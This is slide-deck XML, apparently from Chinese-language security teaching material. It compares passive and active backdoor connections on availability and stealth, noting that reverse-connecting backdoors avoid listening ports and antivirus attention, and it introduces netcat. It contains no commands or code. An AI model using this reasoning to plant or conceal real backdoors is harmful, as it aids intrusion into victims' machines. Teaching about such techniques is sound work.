            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr>
              <a:latin typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="779979" y="2747747"/>
            <a:ext cx="1253667" cy="345440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290" rtlCol="0">
            <a:spAutoFit/>
            <a:scene3d>
              <a:camera prst="orthographicFront"/>
              <a:lightRig rig="threePt" dir="t"/>
            </a:scene3d>
            <a:sp3d contourW="12700"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>网络</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7110074" y="2747747"/>
            <a:ext cx="1253667" cy="345440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290" rtlCol="0">
            <a:spAutoFit/>
            <a:scene3d>
              <a:camera prst="orthographicFront"/>
              <a:lightRig rig="threePt" dir="t"/>
            </a:scene3d>
            <a:sp3d contourW="12700"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>安全</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>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3635977" y="747162"/>
            <a:ext cx="1874458" cy="345440"/>
            <a:chOff x="3623277" y="1285986"/>
            <a:chExt cx="1874458" cy="345440"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="išḷïḑè"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3623277" y="1292078"/>
              <a:ext cx="1874458" cy="334065"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 50000"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="60000"/>
                <a:lumOff val="40000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln w="3175">
              <a:noFill/>
              <a:prstDash val="sysDash"/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="1">
              <a:schemeClr val="accent1"/>
            </a:lnRef>
            <a:fillRef idx="0">
              <a:schemeClr val="accent1"/>
            </a:fillRef>
            <a:effectRef idx="0">
              <a:schemeClr val="accent1"/>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="tx1"/>
            </a:fontRef>
          </p:style>
          <p:txBody>
            <a:bodyPr anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:endParaRPr>
                <a:latin typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="文本框 39"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3782047" y="1285986"/>
              <a:ext cx="1556919" cy="345440"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290" rtlCol="0">
              <a:spAutoFit/>
              <a:scene3d>
                <a:camera prst="orthographicFront"/>
                <a:lightRig rig="threePt" dir="t"/>
              </a:scene3d>
              <a:sp3d contourW="12700"/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>优势</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>之处</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13" name="文本框 41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2039467" y="988205"/>
            <a:ext cx="5080132" cy="3623310"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290" rtlCol="0">
            <a:spAutoFit/>
            <a:scene3d>
              <a:camera prst="orthographicFront"/>
              <a:lightRig rig="threePt" dir="t"/>
            </a:scene3d>
            <a:sp3d contourW="12700"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="225" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>简单对比一下 “后门的两种连接方式”。</a:t>
            </a:r>
            <a:endParaRPr sz="1400" spc="225" dirty="0">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50000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="225" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>　　可用性</a:t>
            </a:r>
            <a:endParaRPr sz="1400" spc="225" dirty="0">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50000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="225" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>　　如果用“被动型后门”入侵桌面 PC，考虑到绝大部分桌面 PC 都处于内网（其网卡【并未】分配公网 IP）。对这种场景，攻击者需要与受害者在同一个局域网，才能与后门建立通讯。  </a:t>
            </a:r>
            <a:endParaRPr sz="1400" spc="225" dirty="0">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50000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="225" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>　　相比之下，“主动型后门”就【没有】这种弊端。</a:t>
            </a:r>
            <a:endParaRPr sz="1400" spc="225" dirty="0">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50000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="225" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>　　隐蔽性  </a:t>
            </a:r>
            <a:endParaRPr sz="1400" spc="225" dirty="0">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50000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="225" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>　　“被动型后门”需要显式开启监听端口，很容易引起用户的怀疑，或引起杀毒软件的注意。  </a:t>
            </a:r>
            <a:endParaRPr sz="1400" spc="225" dirty="0">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50000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="225" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>　　相比之下，“主动型后门”就【没有】这个问题。</a:t>
            </a:r>
            <a:endParaRPr sz="1400" spc="225"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bldLst>
      <p:bldP spid="8" grpId="0"/>
      <p:bldP spid="9"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nector: Elbow 2"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="4572629" y="-767018"/>
            <a:ext cx="13621" cy="5291815"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 3476265"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="0F1D38"/>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 name="Connector: Elbow 3"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4572628" y="644822"/>
            <a:ext cx="13621" cy="5291815"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 3636099"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="0F1D38"/>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 name="îś1íḓè"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="683568" y="1897781"/>
            <a:ext cx="1446490" cy="1446462"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:solidFill>
          <a:ln w="15875">
            <a:noFill/>
            <a:miter lim="800000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr>
              <a:latin typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="iṧlîḑe"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7013385" y="1897515"/>
            <a:ext cx="1447047" cy="1447018"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C00000"/>
          </a:solidFill>
          <a:ln w="15875">
            <a:noFill/>
            <a:miter lim="800000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr>
              <a:latin typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="îṧḷidê"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7500992" y="2111506"/>
            <a:ext cx="501422" cy="501413"/>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bg1"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr>
              <a:latin typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="îṧḷîḍè"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1156102" y="2111506"/>
            <a:ext cx="501422" cy="501413"/>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chemeClr val="bg1"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr>
              <a:latin typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="779979" y="2747747"/>
            <a:ext cx="1253667" cy="345440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290" rtlCol="0">
            <a:spAutoFit/>
            <a:scene3d>
              <a:camera prst="orthographicFront"/>
              <a:lightRig rig="threePt" dir="t"/>
            </a:scene3d>
            <a:sp3d contourW="12700"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>网络</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="文本框 38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7110074" y="2747747"/>
            <a:ext cx="1253667" cy="345440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290" rtlCol="0">
            <a:spAutoFit/>
            <a:scene3d>
              <a:camera prst="orthographicFront"/>
              <a:lightRig rig="threePt" dir="t"/>
            </a:scene3d>
            <a:sp3d contourW="12700"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>安全</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>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3623277" y="1203598"/>
            <a:ext cx="1874458" cy="345440"/>
            <a:chOff x="3623277" y="1285986"/>
            <a:chExt cx="1874458" cy="345440"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="išḷïḑè"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3623277" y="1292078"/>
              <a:ext cx="1874458" cy="334065"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 50000"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="001142"/>
            </a:solidFill>
            <a:ln w="3175">
              <a:noFill/>
              <a:prstDash val="sysDash"/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="1">
              <a:schemeClr val="accent1"/>
            </a:lnRef>
            <a:fillRef idx="0">
              <a:schemeClr val="accent1"/>
            </a:fillRef>
            <a:effectRef idx="0">
              <a:schemeClr val="accent1"/>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="tx1"/>
            </a:fontRef>
          </p:style>
          <p:txBody>
            <a:bodyPr anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:endParaRPr>
                <a:latin typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 39"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3782047" y="1285986"/>
              <a:ext cx="1556919" cy="345440"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290" rtlCol="0">
              <a:spAutoFit/>
              <a:scene3d>
                <a:camera prst="orthographicFront"/>
                <a:lightRig rig="threePt" dir="t"/>
              </a:scene3d>
              <a:sp3d contourW="12700"/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
                  <a:ea typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
                </a:rPr>
                <a:t>netcat</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="文本框 41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2039373" y="1580130"/>
            <a:ext cx="5080132" cy="1960880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290" rtlCol="0">
            <a:spAutoFit/>
            <a:scene3d>
              <a:camera prst="orthographicFront"/>
              <a:lightRig rig="threePt" dir="t"/>
            </a:scene3d>
            <a:sp3d contourW="12700"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" spc="225" dirty="0">
                <a:latin typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>　</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" spc="225" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>netcat 一般简称为 nc，直译为中文就是 “网猫”，被誉为——【网络上的瑞士军刀】。 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" spc="225"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zh-CN" altLang="en-US" sz="1600" spc="225" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>它诞生于 1995 年，在网络安全社区的名气很大（就如同 AK47 在军事领域的名气）。从事网络安防领域的人，应该都知道它。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" spc="225"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bldLst>
      <p:bldP spid="9" grpId="0"/>
      <p:bldP spid="10"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a:off x="0" y="0"/>
            <a:ext cx="6491153" cy="5143500"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 8531131"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 3660868 w 8531131"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 8531131 w 8531131"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 3660868 w 8531131"/>
              <a:gd name="connsiteY3" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 853113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31131" h="6858000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3660868" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8531131" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3660868" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="685800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sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="827518" y="1443877"/>
            <a:ext cx="3924435" cy="1607185"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="5000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="5000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>能</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="5000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>干啥？</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="5000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="等腰三角形 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="899969" y="3076140"/>
            <a:ext cx="720080" cy="456479"/>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2" descr="C:\Users\Administrator\Desktop\51yuadddnsu.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13172"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3923928" y="159481"/>
            <a:ext cx="5271253" cy="4984019"/>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197768" y="159482"/>
            <a:ext cx="8748464" cy="4824536"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="190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p:timing>
    <p:tnLst>
      <p:par>
